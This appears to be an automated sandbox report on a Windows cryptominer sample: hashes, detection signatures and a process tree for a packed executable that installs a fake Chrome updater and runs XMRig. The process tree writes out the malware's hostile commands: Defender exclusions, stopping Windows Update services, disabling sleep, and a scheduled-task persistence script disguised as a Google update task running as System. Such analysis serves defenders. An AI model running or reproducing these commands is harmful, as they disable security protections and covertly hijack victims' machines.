Analysis
-
max time kernel
301s -
max time network
291s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
24/04/2023, 22:17
Behavioral task
behavioral1
Sample
42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe
Resource
win7-20230220-en
General
-
Target
42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe
-
Size
13.7MB
-
MD5
3f44d752bae1088e80da33fb347aaab8
-
SHA1
1157ccf838ddfa008433756e717767f458262891
-
SHA256
42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc
-
SHA512
ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb
-
SSDEEP
393216:3iVaLvTzIErk836L3FLgG8X34MU9DSx5k:3iVaPzIgkm6L234MU9ci
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1264 created 1256 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 17 PID 1264 created 1256 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 17 PID 1264 created 1256 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 17 PID 1264 created 1256 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 17 PID 1264 created 1256 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 17 PID 1316 created 1256 1316 updater.exe 17 PID 1316 created 1256 1316 updater.exe 17 PID 1316 created 1256 1316 updater.exe 17 PID 1316 created 1256 1316 updater.exe 17 PID 1316 created 1256 1316 updater.exe 17 PID 1316 created 1256 1316 updater.exe 17 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe -
XMRig Miner payload 26 IoCs
resource yara_rule behavioral1/memory/1316-91-0x000000013F8D0000-0x00000001406DE000-memory.dmp xmrig behavioral1/memory/1324-95-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-97-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-100-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-102-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-104-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-106-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-108-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-110-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-112-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-114-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-116-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-118-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-120-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-122-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-124-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-126-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-128-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-130-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-132-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-134-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-136-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-138-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-140-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-142-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1324-144-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Executes dropped EXE 1 IoCs
pid Process 1316 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 948 taskeng.exe -
resource yara_rule behavioral1/memory/1264-54-0x000000013F580000-0x000000014038E000-memory.dmp themida behavioral1/memory/1264-76-0x000000013F580000-0x000000014038E000-memory.dmp themida behavioral1/files/0x00080000000132f5-77.dat themida behavioral1/files/0x00080000000132f5-79.dat themida behavioral1/memory/1316-80-0x000000013F8D0000-0x00000001406DE000-memory.dmp themida behavioral1/files/0x00080000000132f5-88.dat themida behavioral1/memory/1316-91-0x000000013F8D0000-0x00000001406DE000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1316 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1316 set thread context of 592 1316 updater.exe 68 PID 1316 set thread context of 1324 1316 updater.exe 69 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1772 sc.exe 1392 sc.exe 984 sc.exe 1556 sc.exe 584 sc.exe 1928 sc.exe 1964 sc.exe 1632 sc.exe 528 sc.exe 1516 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1424 schtasks.exe 332 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00173b640b77d901 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1236 powershell.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 804 powershell.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1264 42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe 1316 updater.exe 1316 updater.exe 1848 powershell.exe 1316 updater.exe 1316 updater.exe 1316 updater.exe 1316 updater.exe 1316 updater.exe 1316 updater.exe 1612 powershell.exe 1316 updater.exe 1316 updater.exe 1316 updater.exe 1316 updater.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe 1324 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1236 powershell.exe Token: SeShutdownPrivilege 1660 powercfg.exe Token: SeShutdownPrivilege 1032 powercfg.exe Token: SeShutdownPrivilege 1596 powercfg.exe Token: SeDebugPrivilege 804 powershell.exe Token: SeShutdownPrivilege 1668 powercfg.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeShutdownPrivilege 1764 powercfg.exe Token: SeShutdownPrivilege 1348 powercfg.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeShutdownPrivilege 2036 powercfg.exe Token: SeShutdownPrivilege 1360 powercfg.exe Token: SeDebugPrivilege 1316 updater.exe Token: SeLockMemoryPrivilege 1324 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1524 wrote to memory of 528 1524 cmd.exe 32 PID 1524 wrote to memory of 528 1524 cmd.exe 32 PID 1524 wrote to memory of 528 1524 cmd.exe 32 PID 1524 wrote to memory of 984 1524 cmd.exe 33 PID 1524 wrote to memory of 984 1524 cmd.exe 33 PID 1524 wrote to memory of 984 1524 cmd.exe 33 PID 1524 wrote to memory of 1516 1524 cmd.exe 34 PID 1524 wrote to memory of 1516 1524 cmd.exe 34 PID 1524 wrote to memory of 1516 1524 cmd.exe 34 PID 1524 wrote to memory of 584 1524 cmd.exe 35 PID 1524 wrote to memory of 584 1524 cmd.exe 35 PID 1524 wrote to memory of 584 1524 cmd.exe 35 PID 1524 wrote to memory of 1928 1524 cmd.exe 36 PID 1524 wrote to memory of 1928 1524 cmd.exe 36 PID 1524 wrote to memory of 1928 1524 cmd.exe 36 PID 1092 wrote to memory of 1660 1092 cmd.exe 41 PID 1092 wrote to memory of 1660 1092 cmd.exe 41 PID 1092 wrote to memory of 1660 1092 cmd.exe 41 PID 1092 wrote to memory of 1032 1092 cmd.exe 42 PID 1092 wrote to memory of 1032 1092 cmd.exe 42 PID 1092 wrote to memory of 1032 1092 cmd.exe 42 PID 1092 wrote to memory of 1596 1092 cmd.exe 43 PID 1092 wrote to memory of 1596 1092 cmd.exe 43 PID 1092 wrote to memory of 1596 1092 cmd.exe 43 PID 1092 wrote to memory of 1668 1092 cmd.exe 44 PID 1092 wrote to memory of 1668 1092 cmd.exe 44 PID 1092 wrote to memory of 1668 1092 cmd.exe 44 PID 804 wrote to memory of 1424 804 powershell.exe 45 PID 804 wrote to memory of 1424 804 powershell.exe 45 PID 804 wrote to memory of 1424 804 powershell.exe 45 PID 948 wrote to memory of 1316 948 taskeng.exe 49 PID 948 wrote to memory of 1316 948 taskeng.exe 49 PID 948 wrote to memory of 1316 948 taskeng.exe 49 PID 1932 wrote to memory of 1964 1932 cmd.exe 54 PID 1932 wrote to memory of 1964 1932 cmd.exe 54 PID 1932 wrote to memory of 1964 1932 cmd.exe 54 PID 1932 wrote to memory of 1556 1932 cmd.exe 55 PID 1932 wrote to memory of 1556 1932 cmd.exe 55 PID 1932 wrote to memory of 1556 1932 cmd.exe 55 PID 1932 wrote to memory of 1772 1932 cmd.exe 56 PID 1932 wrote to memory of 1772 1932 cmd.exe 56 PID 1932 wrote to memory of 1772 1932 cmd.exe 56 PID 1932 wrote to memory of 1392 1932 cmd.exe 57 PID 1932 wrote to memory of 1392 1932 cmd.exe 57 PID 1932 wrote to memory of 1392 1932 cmd.exe 57 PID 1932 wrote to memory of 1632 1932 cmd.exe 58 PID 1932 wrote to memory of 1632 1932 cmd.exe 58 PID 1932 wrote to memory of 1632 1932 cmd.exe 58 PID 1740 wrote to memory of 1764 1740 cmd.exe 63 PID 1740 wrote to memory of 1764 1740 cmd.exe 63 PID 1740 wrote to memory of 1764 1740 cmd.exe 63 PID 1740 wrote to memory of 1348 1740 cmd.exe 64 PID 1740 wrote to memory of 1348 1740 cmd.exe 64 PID 1740 wrote to memory of 1348 1740 cmd.exe 64 PID 1740 wrote to memory of 2036 1740 cmd.exe 65 PID 1740 wrote to memory of 2036 1740 cmd.exe 65 PID 1740 wrote to memory of 2036 1740 cmd.exe 65 PID 1740 wrote to memory of 1360 1740 cmd.exe 66 PID 1740 wrote to memory of 1360 1740 cmd.exe 66 PID 1740 wrote to memory of 1360 1740 cmd.exe 66 PID 1612 wrote to memory of 332 1612 powershell.exe 67 PID 1612 wrote to memory of 332 1612 powershell.exe 67 PID 1612 wrote to memory of 332 1612 powershell.exe 67 PID 1316 wrote to memory of 592 1316 updater.exe 68 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe"C:\Users\Admin\AppData\Local\Temp\42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:528
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:984
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1516
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:584
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1928
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#machcb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1424
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1964
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1772
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1392
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1632
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#machcb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:332
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:592
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5FD3141A-2B1F-457F-807A-6A4626BF97DF} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13.7MB
MD53f44d752bae1088e80da33fb347aaab8
SHA11157ccf838ddfa008433756e717767f458262891
SHA25642a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc
SHA512ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb
-
Filesize
13.7MB
MD53f44d752bae1088e80da33fb347aaab8
SHA11157ccf838ddfa008433756e717767f458262891
SHA25642a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc
SHA512ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD518d4aee5e2089215ec82d6b98f839102
SHA13cb6367897d8fcdc940af49a1dca44efc0a4a30a
SHA2567cd7ed255f96e57e4eaa308079086ea91509fddf082022b19ccbbb83c1b7cecd
SHA512f87bd7eb71cba2879989fc845a4d6015f26985499d0ef7026ee1887f68014af6d45a7bc414d8fa19c6c46c5c9fb30cec942a89f319918a49c6981703cf7b5aae
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QBIQBR9IE1EKUY85198.temp
Filesize7KB
MD518d4aee5e2089215ec82d6b98f839102
SHA13cb6367897d8fcdc940af49a1dca44efc0a4a30a
SHA2567cd7ed255f96e57e4eaa308079086ea91509fddf082022b19ccbbb83c1b7cecd
SHA512f87bd7eb71cba2879989fc845a4d6015f26985499d0ef7026ee1887f68014af6d45a7bc414d8fa19c6c46c5c9fb30cec942a89f319918a49c6981703cf7b5aae
-
Filesize
2KB
MD53e9af076957c5b2f9c9ce5ec994bea05
SHA1a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f
-
Filesize
13.7MB
MD53f44d752bae1088e80da33fb347aaab8
SHA11157ccf838ddfa008433756e717767f458262891
SHA25642a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc
SHA512ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb